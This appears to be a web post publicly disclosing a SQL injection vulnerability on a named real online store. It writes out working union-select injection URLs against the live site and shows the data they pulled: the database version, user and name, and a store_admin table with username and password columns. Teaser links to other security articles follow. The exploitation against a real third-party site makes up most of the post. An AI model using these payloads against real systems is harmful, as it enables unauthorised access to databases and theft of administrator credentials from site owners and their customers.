PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group.

These are some information from Vulneral Site http://www.irrawaddystore.com :

This vulnerability has been alerted to :- [email protected]

@@version,user(),database()

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>


5.0.90-community:irrawadd_user@localhost:irrawadd_store

9

table_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>

column_name

<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Webmasters misery after the website got hacked; Google sandbox, Hosting dismissal and much more

Hello, I run a websites on graphics design, greeting cards and website design. Most of the items are free for visitors and I make my money from advertisement using Adsense.

Buffer Overflows

Buffer Overflow Overview Buffer overflows are the classic security vulnerability that have been around since the beginning of programming, and are still occurring everywhere today. Buffer overflows are very prevalent

Error Messages

Error Messages Overview Think about these questions. * Why are Error Conditions and Error Messages a security problem? * What’s wrong with error conditions? * Wouldn’t an administrator want the